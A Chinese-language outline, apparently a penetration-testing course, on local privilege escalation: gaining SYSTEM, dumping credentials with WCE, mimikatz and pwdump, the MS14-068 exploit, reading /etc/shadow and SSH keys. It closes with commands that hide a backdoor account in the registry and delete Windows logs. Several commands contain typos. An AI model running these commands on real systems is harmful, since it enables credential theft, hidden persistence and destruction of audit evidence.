Kali Linux 从入门到精通(十一)–提权
本地提权
- 已实现本地低权限账号登录
- 远程溢出
- 直接获得账号密码
- 希望获取更高权限
- 实现对目标进一步控制
- 系统之间权限隔离
- 操作系统安全的基础
- 用户空间
- 内核空间
- 系统账号
- 用户账号登陆时获取权限令牌
- 服务账号无需用户登陆已在后台启动服务
- Windows
- user
- Administrator
- System:实质最大权限账号
- 注:非包含关系,交集
- Linux
- User
- Root:相当于Administrator和System
Windows 系统提权之----ADMIN–提取为SYSTEM
- Windos账号
- 系统设置管理功能
- Sysinternal Suit
- https://technet.microsoft.com/en-us/sysinternals
- psexec -i -s -d taskmgr
- at 19:39 /interactive cmd
- sc Create syscmd binPath=“cmd /K start” type=own type=“interact”
- sc start syscmd(系统默认以SYSTEM方式启动服务)
- 注入进程提权
- 隐藏痕迹
- pinjector.exe
抓包嗅探
- Windows
- Wireshark
- Omnipeek:Windows抓包工具,界面友好
- commview
- Sniffpass (基于抓包密码抓取数据)
- Linux
- Tcpdump
- Wireshark
- Dsniff (抓取密码)
键盘登录
- Keylogger
- 木马窃取
本地缓存密码
- 浏览器缓存的密码
- IE浏览器
- Firefox
- 网络密码
- 无线密码
- http://www.nirsoft.net
- Dump SAM(数据库)
- Pwdump(从windows的SAM中读取密文)
- /usr/share/windows-binaried/fgdump/
- 生成PWDUMP 文件
- 使用ophcrack(密码破解工具) 进行爆破
Windows 身份认证过程
WCE(WINDOWS CREDENTIAL EDITOR)<======工具(win7之前)
- /usr/share/wce/
- 需要管理员权限
- wce-universal.exe -l / -lv
- wce-universal.exe -d
- wce-universal.exe -e / -r
- wce-universal.exe -g
- wce-universal.exe -w
- LM/NT bash
- 从内存读取LM/NLTM hash
- Digest AAUTHENTICATION Package
- NLTM Security Package
- Kerberos Security Package
- 防止WCE攻击
其他工具
- pwdump localhost
- fgdump
- mimikatz
- privilege::debug # 提升权限
- sekulsa::logonPasswords
利用漏洞提权
- MS 11-80 漏洞 ( 单机漏洞提取)
- Ms 11-080 (11 年第80个漏洞)—> 中文版本会产生dos(拒绝服务攻击)
- Kb2592799
- Pyinstaller
- Pywin32
- MS11-046
- DoS
- MS14-068 漏洞 (获得域的管理员权限 操控多台计算机)
- 库
- ms14-068.py -uuser@lab.com -s userSID -ddc.lab.com
- 拷贝 TGT_user1@lab.com cache到windos系统
- 本地管理员登录
- mimkatz.exe
- CVE-2012-0056 (Linux OS 漏洞)
- /proc/pid/mem (进程权限控制不严格)
- kernels>2.6.39
- http://blog.zx2c4.com/749
利用配置不当提权
- 与漏洞提取相比 更常用的方法
- 企业环境
- 补丁更新的全部已经安装
- 输入变量过滤之外更值得研发关注的安全隐患
- 以system的权限启动
- NTFS权限允许users修改删除
- icals
- icals c:\windows*.exe /save perm /T
- Find
- find / -perm 777 -execls -l {} ;
- 应用系统的配置文件
- 应用连接数据库的配置文件
- 后台服务运行账号
基本信息收集
- Linux
- /etc/resolv.conf
- /etc/passwd
- /etc/shadow (保存有密码)
- whoami,who -a
- ifconfig -a iptables -L -n,netstat -rn
- uname -a,ps aux
- dpkg -l | head
- Windows
- ipconfig / all, ipconfig/displaydns netstat -bnao,netstat -r
- net view,netview /domain
- net user/domain
- net accounts,net share
- net localgroup administarators username /add
- net group “Domain Controlleds” /domain
WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)<—强大功能
- wmic nicconfig get ipaddress,nacadess
- wmic computersystem get username
收集敏感信息
- 商业信息
- 系统信息
- Linux
- /etc ; /usr/local/etc
- /etc/pass ; /etc/shadow
- .ssh ; .gnupg 公私钥
- The e-mail and data file
- 业务数据库 ; 身份认证服务器数据库
- /tmp
- Windows
- SAM 数据库 ; 注册表文件
- %SYSTEMROOT%\repair\SAM (存放SAM副本)
- %SYSTEMROOTS%\System32\config\RegBack\SAM (存放SAM副本)
- 业务数据库 ; 身份认证数据库
- 临时文件目录
隐藏痕迹
- 禁止在登录界面显示新建账号
- REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windoes NT\CurrentVersion\WinLogon\SpecialAccounts\UserList” /v uname /T
REG_SWORD/D 0 (隐藏账号)
- del %WINDIR%*.log /a/s/q/f
- History
- 日志
- auth.log / secure
- btmp / wtmp
- lastlog / faillog
- 其他日志和HIDS等
